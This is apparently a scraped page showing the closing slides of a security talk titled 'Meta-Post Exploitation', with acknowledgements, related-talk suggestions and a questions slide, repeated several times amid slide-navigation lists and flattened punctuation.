- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-